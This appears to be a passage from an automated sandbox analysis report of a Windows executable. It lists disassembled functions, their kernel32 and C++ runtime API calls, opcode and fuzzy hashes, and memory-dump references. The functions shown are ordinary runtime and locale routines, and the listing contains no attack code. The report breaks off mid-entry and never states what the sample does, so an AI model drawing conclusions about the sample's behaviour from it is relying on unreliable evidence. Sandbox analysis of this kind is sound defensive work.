                                                                                    • API String ID: 2417226690-0
                                                                                    • Opcode ID: ab60488e47c2fb417bf6c8e5d3ee03f939c1bed075d50ed3749c1970044e2fa5
                                                                                    • Instruction ID: ab0b4ef3f8c16db3c4336c336c6580e068788596aa415a98850749390b08940d
                                                                                    • Opcode Fuzzy Hash: ab60488e47c2fb417bf6c8e5d3ee03f939c1bed075d50ed3749c1970044e2fa5
                                                                                    • Instruction Fuzzy Hash: 3D11257B2007099FDB189F79C8916BABB93FF80768B14442DEA468BB40D771B942CB40
                                                                                    Function 006FB519 Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 006F22E9: GetLastError.KERNEL32(?,?,006EB788,00708A98,0000000C), ref: 006F22ED
                                                                                      • Part of subcall function 006F22E9: SetLastError.KERNEL32(00000000), ref: 006F238F
                                                                                    • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,006FB2B3,00000000,00000000,?), ref: 006FB545
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1589669493.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1589647583.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589687618.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589701895.000000000070A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589701895.000000000073C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589743234.000000000073F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6e0000_file.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$InfoLocale
                                                                                    • String ID:
                                                                                    • API String ID: 3736152602-0
                                                                                    • Opcode ID: 4f92159db90295d806560d9e706bf6cb7debc8393e1c8befce2f8e2be54e5cb8
                                                                                    • Instruction ID: a7cb0cc9753634f59e04923a043e70c95404f3e441e6676972a2bd61566c746f
                                                                                    • Opcode Fuzzy Hash: 4f92159db90295d806560d9e706bf6cb7debc8393e1c8befce2f8e2be54e5cb8
                                                                                    • Instruction Fuzzy Hash: B3F0F976A1011DABDF245F64CC06BFA7756EB40754F144429EE01A3240EB78FE41C694
                                                                                    Function 006FB00C Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 006F22E9: GetLastError.KERNEL32(?,?,006EB788,00708A98,0000000C), ref: 006F22ED
                                                                                      • Part of subcall function 006F22E9: SetLastError.KERNEL32(00000000), ref: 006F238F
                                                                                    • EnumSystemLocalesW.KERNEL32(006FB2EA,00000001,?,?,-00000050,?,006FB68C,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 006FB056
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1589669493.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1589647583.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589687618.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589701895.000000000070A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589701895.000000000073C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589743234.000000000073F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6e0000_file.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$EnumLocalesSystem
                                                                                    • String ID:
                                                                                    • API String ID: 2417226690-0
                                                                                    • Opcode ID: 4a8ef9bbd002f3d92eaf892d863ea8fbbadbc2f8a68469cf5630504d6e66ecd4
                                                                                    • Instruction ID: bb9f7ad9f60458a658fe151030e6ec8bee74366d51c08848731210a1e04de184
                                                                                    • Opcode Fuzzy Hash: 4a8ef9bbd002f3d92eaf892d863ea8fbbadbc2f8a68469cf5630504d6e66ecd4
                                                                                    • Instruction Fuzzy Hash: 38F0F63620030C9FDB245F75DC96ABB7B92FF81768F05842DFA054B690DB719D42CA54
                                                                                    Function 006F25E1 Relevance: 1.5, APIs: 1, Instructions: 33COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 006EC954: EnterCriticalSection.KERNEL32(?,?,006F1FBF,?,00708DE8,00000008,006F2185,?,?,?), ref: 006EC963
                                                                                    • EnumSystemLocalesW.KERNEL32(Function_000125D4,00000001,00708E68,0000000C,006F2A43,?), ref: 006F2619
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1589669493.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1589647583.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589687618.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589701895.000000000070A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589701895.000000000073C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589743234.000000000073F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6e0000_file.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                    • String ID:
                                                                                    • API String ID: 1272433827-0
                                                                                    • Opcode ID: 847769d555ad1b2f48ca74fd49681b1338fafae34d7b1523b794519025088914
                                                                                    • Instruction ID: 611c1c10524cc11ed0de70e63d0bdc8e53cf4ca05b02372e160020d024e21b55
                                                                                    • Opcode Fuzzy Hash: 847769d555ad1b2f48ca74fd49681b1338fafae34d7b1523b794519025088914
                                                                                    • Instruction Fuzzy Hash: 1CF03772A00309DFEB40DF98E846BAD77F1EB04721F10812AE911AB2A1CB7959408F99
                                                                                    Function 006FAF26 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 006F22E9: GetLastError.KERNEL32(?,?,006EB788,00708A98,0000000C), ref: 006F22ED
                                                                                      • Part of subcall function 006F22E9: SetLastError.KERNEL32(00000000), ref: 006F238F
                                                                                    • EnumSystemLocalesW.KERNEL32(006FAE7F,00000001,?,?,?,006FB6EA,-00000050,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 006FAF5D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1589669493.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1589647583.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589687618.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589701895.000000000070A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589701895.000000000073C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589743234.000000000073F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6e0000_file.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$EnumLocalesSystem
                                                                                    • String ID:
                                                                                    • API String ID: 2417226690-0
                                                                                    • Opcode ID: 4a7233f5fc50799e8e26dea1f910f60c84f77cb9561bc993c48b1e81b67ccf6f
                                                                                    • Instruction ID: bc662e2204ab10ed07bee4e7ddbc6f0d6b60fdd19319016f84da5bee57946f57
                                                                                    • Opcode Fuzzy Hash: 4a7233f5fc50799e8e26dea1f910f60c84f77cb9561bc993c48b1e81b67ccf6f
                                                                                    • Instruction Fuzzy Hash: 8EF0557630020D97CB04AFB5D8066BA7F92EFC1B20F064059EB098B351C6319842C7A1
                                                                                    Function 006E7C91 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SetUnhandledExceptionFilter.KERNEL32(Function_00007C9D,006E714A), ref: 006E7C96
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1589669493.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1589647583.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589687618.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589701895.000000000070A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589701895.000000000073C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589743234.000000000073F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6e0000_file.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ExceptionFilterUnhandled
                                                                                    • String ID:
                                                                                    • API String ID: 3192549508-0
                                                                                    • Opcode ID: 95e8e55dba6e5cc8e41a8a789c7a6e17f1412cb1143e505b8713f24a75e5aaa1
                                                                                    • Instruction ID: 6a9a974d5d02d496272832fcbb25f4e058b3c1cda738ef451aef0b8a45bf8803
                                                                                    • Opcode Fuzzy Hash: 95e8e55dba6e5cc8e41a8a789c7a6e17f1412cb1143e505b8713f24a75e5aaa1
                                                                                    • Instruction Fuzzy Hash:
                                                                                    Function 006FB84A Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1589669493.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1589647583.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589687618.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589701895.000000000070A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589701895.000000000073C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589743234.000000000073F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6e0000_file.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: HeapProcess
                                                                                    • String ID:
                                                                                    • API String ID: 54951025-0
                                                                                    • Opcode ID: 3b9a293b8d88e69d66bd5bd99441f98ded558ae17cd7779e793c1118bca03e50
                                                                                    • Instruction ID: 6f4c8da0bf9c7fd77f7e2f5edb001757f33621506163122adacdd787aa1911e5
                                                                                    • Opcode Fuzzy Hash: 3b9a293b8d88e69d66bd5bd99441f98ded558ae17cd7779e793c1118bca03e50
                                                                                    • Instruction Fuzzy Hash: C0A01270200100CF93004F315A0630C35985A41191700C1185004C4060DA3840104F48
                                                                                    Function 006F2E4B Relevance: .0, Instructions: 22COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1589669493.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1589647583.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589687618.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589701895.000000000070A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589701895.000000000073C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589743234.000000000073F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6e0000_file.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 23ebd0bd5e6436c6e2895a3075ff04c1db8902bf7fd9e8bc258d8b36fe32f176
                                                                                    • Instruction ID: cf6227e716b8cd9adb4bebf7b37cc7d4861a018361e9de7a2279298c3773e43b
                                                                                    • Opcode Fuzzy Hash: 23ebd0bd5e6436c6e2895a3075ff04c1db8902bf7fd9e8bc258d8b36fe32f176
                                                                                    • Instruction Fuzzy Hash: 83E08C3291122CEBCB14DB88C91499AF3FDEB44B40B21019AB621D3211C270DE04DBD0
                                                                                    Function 006F0040 Relevance: .0, Instructions: 12COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1589669493.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1589647583.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589687618.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589701895.000000000070A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589701895.000000000073C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589743234.000000000073F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6e0000_file.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 71af946d484c22e2509226cd1cebb901a6eaaa6ba92764596b5496140318ba04
                                                                                    • Instruction ID: da90e1b12b484f397b721849ba7db5125a23bc5463a562945846416bc5678a04
                                                                                    • Opcode Fuzzy Hash: 71af946d484c22e2509226cd1cebb901a6eaaa6ba92764596b5496140318ba04
                                                                                    • Instruction Fuzzy Hash: 3EC08C3C20090846DF29A91882713F43357B391782F90048CCA1A0B743CE5F9CC2DA00
                                                                                    Function 006E5564 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 65COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __EH_prolog3.LIBCMT ref: 006E556B
                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 006E5575
                                                                                    • int.LIBCPMT ref: 006E558C
                                                                                      • Part of subcall function 006E173A: std::_Lockit::_Lockit.LIBCPMT ref: 006E174B
                                                                                      • Part of subcall function 006E173A: std::_Lockit::~_Lockit.LIBCPMT ref: 006E1765
                                                                                    • codecvt.LIBCPMT ref: 006E55AF
                                                                                    • std::_Facet_Register.LIBCPMT ref: 006E55C6
                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 006E55E6
                                                                                    • Concurrency::cancel_current_task.LIBCPMT ref: 006E55F3
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1589669493.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1589647583.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589687618.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589701895.000000000070A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589701895.000000000073C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589743234.000000000073F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6e0000_file.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registercodecvt
                                                                                    • String ID: mEn
                                                                                    • API String ID: 2133458128-2555016830
                                                                                    • Opcode ID: 149d2e6bfc510dfb67fe9ae320a382574c60d2b7baf7ff43b4984ba21268ec69
                                                                                    • Instruction ID: eb187aeaf4c9717d601aaf713909ee695b3b54f85b3dfcef4bca8de2002c3f1c
                                                                                    • Opcode Fuzzy Hash: 149d2e6bfc510dfb67fe9ae320a382574c60d2b7baf7ff43b4984ba21268ec69
                                                                                    • Instruction Fuzzy Hash: D811DF319027949BCB44AB69D8067AD77B7AF44324F14090DE502A7381DF74AE018B88
                                                                                    Function 006E3E31 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 65COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __EH_prolog3.LIBCMT ref: 006E3E38
                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 006E3E42
                                                                                    • int.LIBCPMT ref: 006E3E59
                                                                                      • Part of subcall function 006E173A: std::_Lockit::_Lockit.LIBCPMT ref: 006E174B
                                                                                      • Part of subcall function 006E173A: std::_Lockit::~_Lockit.LIBCPMT ref: 006E1765
                                                                                    • codecvt.LIBCPMT ref: 006E3E7C
                                                                                    • std::_Facet_Register.LIBCPMT ref: 006E3E93
                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 006E3EB3
                                                                                    • Concurrency::cancel_current_task.LIBCPMT ref: 006E3EC0
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1589669493.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1589647583.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589687618.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589701895.000000000070A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589701895.000000000073C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589743234.000000000073F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6e0000_file.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registercodecvt
                                                                                    • String ID: mEn
                                                                                    • API String ID: 2133458128-2555016830
                                                                                    • Opcode ID: ea42f7742649daba7b89e7cb7c034d90d76950307095d898e0fcf617b2ed6c9a
                                                                                    • Instruction ID: 99ef95bb918b8caa49c7e351a9090f68aee1a487d6fd03f15e48f58563b7b32d
                                                                                    • Opcode Fuzzy Hash: ea42f7742649daba7b89e7cb7c034d90d76950307095d898e0fcf617b2ed6c9a
                                                                                    • Instruction Fuzzy Hash: 0611E4319023A4DBCB55EF65A80A6AEBBF7AF44310F14051DE5059B391DF74AE018788
                                                                                    Function 006E6FD9 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 19libraryloaderCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 006E6FDF
                                                                                    • GetProcAddress.KERNEL32(00000000,GetCurrentPackageId), ref: 006E6FED
                                                                                    • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 006E6FFE
                                                                                    • GetProcAddress.KERNEL32(00000000,GetTempPath2W), ref: 006E700F
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1589669493.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1589647583.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589687618.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589701895.000000000070A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589701895.000000000073C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589743234.000000000073F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6e0000_file.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AddressProc$HandleModule
                                                                                    • String ID: GetCurrentPackageId$GetSystemTimePreciseAsFileTime$GetTempPath2W$kernel32.dll
                                                                                    • API String ID: 667068680-1247241052
                                                                                    • Opcode ID: 408381f0bccd6e8e0b625dbaf0e7b3046ebd882c7406aff67bc6cf17696c7a44
                                                                                    • Instruction ID: 37aefaec9f9da1115e14e8e1c8ce00725e497bb00e455131583dfef4ded99279
                                                                                    • Opcode Fuzzy Hash: 408381f0bccd6e8e0b625dbaf0e7b3046ebd882c7406aff67bc6cf17696c7a44
                                                                                    • Instruction Fuzzy Hash: 03E02FB5E51260EBE710AB74BC0DA9A7AE4BB49771741C715F505D2190DBBC44008FA8
                                                                                    Function 006EA788 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 303COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • type_info::operator==.LIBVCRUNTIME ref: 006EA8A7
                                                                                    • ___TypeMatch.LIBVCRUNTIME ref: 006EA9B5
                                                                                    • _UnwindNestedFrames.LIBCMT ref: 006EAB07
                                                                                    • CallUnexpected.LIBVCRUNTIME ref: 006EAB22
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1589669493.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1589647583.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589687618.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589701895.000000000070A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589701895.000000000073C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589743234.000000000073F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6e0000_file.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                                    • String ID: csm$csm$csm
                                                                                    • API String ID: 2751267872-393685449
                                                                                    • Opcode ID: 4aa11110f662477c5e85e4c46ded4d163fbff95cfcf31be0ab99e7d094ea0f96
                                                                                    • Instruction ID: cce6cf1e617745f4c7ea961280a7583d2bad9492df638487869082ecb59e9988
                                                                                    • Opcode Fuzzy Hash: 4aa11110f662477c5e85e4c46ded4d163fbff95cfcf31be0ab99e7d094ea0f96
                                                                                    • Instruction Fuzzy Hash: D5B18D71802389EFCF15DFD6C9819AEBBB6FF14310B15416AE8016B352D730EA52CB96
                                                                                    Function 006E3532 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 48COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 006E353E
                                                                                    • int.LIBCPMT ref: 006E3551
                                                                                      • Part of subcall function 006E173A: std::_Lockit::_Lockit.LIBCPMT ref: 006E174B
                                                                                      • Part of subcall function 006E173A: std::_Lockit::~_Lockit.LIBCPMT ref: 006E1765
                                                                                    • std::_Facet_Register.LIBCPMT ref: 006E3584
                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 006E359A
                                                                                    • Concurrency::cancel_current_task.LIBCPMT ref: 006E35A5
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1589669493.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1589647583.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589687618.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589701895.000000000070A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589701895.000000000073C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589743234.000000000073F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6e0000_file.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                    • String ID: Z'n$Z'n
                                                                                    • API String ID: 2081738530-416741392
                                                                                    • Opcode ID: 853ca2c60e9b6b3744b5435acd3a938d6eaf80819bb4aa7be09f1306c9b34d1d
                                                                                    • Instruction ID: 23be819c531f7087879f368e3cffd0e86a679341ca1d0c9bc6ccb475fff321c7
                                                                                    • Opcode Fuzzy Hash: 853ca2c60e9b6b3744b5435acd3a938d6eaf80819bb4aa7be09f1306c9b34d1d
                                                                                    • Instruction Fuzzy Hash: 3A014772902364ABCB04AB56C80A8ED776ADF80720F10010DF8119B391DB309F018798
                                                                                    Function 006FD733 Relevance: 12.2, APIs: 8, Instructions: 248COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1589669493.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1589647583.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589687618.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589701895.000000000070A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589701895.000000000073C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589743234.000000000073F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6e0000_file.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: __freea$__alloca_probe_16$Info
                                                                                    • String ID:
                                                                                    • API String ID: 127012223-0
                                                                                    • Opcode ID: d087dcd3f4bd9fa5885202c4919e97360305d4ea2528f0776225cc8837063cdf
                                                                                    • Instruction ID: 734cdabb2e0c4ef21590659f3f69b1adfe91345c63be5f631adf3299c23def3a
                                                                                    • Opcode Fuzzy Hash: d087dcd3f4bd9fa5885202c4919e97360305d4ea2528f0776225cc8837063cdf
                                                                                    • Instruction Fuzzy Hash: 0071027290024EABDF219FA5CC81BFE77BBAF45350F290059EA14A7381D675EC01C7A4
                                                                                    Function 006E6DBD Relevance: 12.2, APIs: 8, Instructions: 175COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 006E6E06
                                                                                    • __alloca_probe_16.LIBCMT ref: 006E6E32
                                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 006E6E71
                                                                                    • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 006E6E8E
                                                                                    • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 006E6ECD
                                                                                    • __alloca_probe_16.LIBCMT ref: 006E6EEA
                                                                                    • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 006E6F2C
                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 006E6F4F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1589669493.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1589647583.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589687618.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589701895.000000000070A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589701895.000000000073C000.00000004.00000001.01000000.00000003.sdmpDownload File
